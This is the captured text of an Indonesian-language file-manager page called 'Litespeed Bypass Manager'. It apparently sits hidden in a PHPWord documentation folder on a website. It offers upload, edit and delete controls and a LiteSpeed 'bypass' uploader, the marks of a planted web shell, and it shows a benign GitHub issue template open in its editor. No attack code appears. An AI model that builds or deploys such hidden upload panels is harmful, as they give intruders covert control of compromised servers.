Litespeed Bypass Manager
Direktori:
/admin/vendor/phpoffice/phpword/docs
⬆️ Kembali
Buat Folder Baru
Buat Folder
Upload File
Upload
⚠️ Litespeed Uploader
Isi Folder
📁
images
Folder
Hapus
📄 ISSUE_TEMPLATE.md
Edit
Hapus
📄 Makefile
Edit
Hapus
📄 PULL_REQUEST_TEMPLATE.md
Edit
Hapus
📄 conf.py
Edit
Hapus
📄 containers.rst
Edit
Hapus
📄 credits.rst
Edit
Hapus
📄 elements.rst
Edit
Hapus
📄 faq.rst
Edit
Hapus
📄 general.rst
Edit
Hapus
📄 index.rst
Edit
Hapus
📄 installing.rst
Edit
Hapus
📄 intro.rst
Edit
Hapus
📄 recipes.rst
Edit
Hapus
📄 references.rst
Edit
Hapus
📄 styles.rst
Edit
Hapus
📄 templates-processing.rst
Edit
Hapus
📄 writersreaders.rst
Edit
Hapus
Edit File: ISSUE_TEMPLATE.md
This is: - [ ] a bug report - [ ] a feature request - [ ] **not** a usage question (ask them on https://stackoverflow.com/questions/tagged/phpword) # Expected Behavior Please describe the behavior you are expecting. ### Current Behavior What is the current behavior? ### Failure Information Please help provide information about the failure. ### How to Reproduce Please provide a code sample that reproduces the issue. ```php <?php require __DIR__ . '/vendor/autoload.php'; $phpWord = new \PhpOffice\PhpWord\PhpWord(); $section = $phpWord->addSection(); $section->... ``` ### Context * PHP version: * PHPWord version: 0.14
Simpan
Catatan: Mengedit file biner tidak disarankan.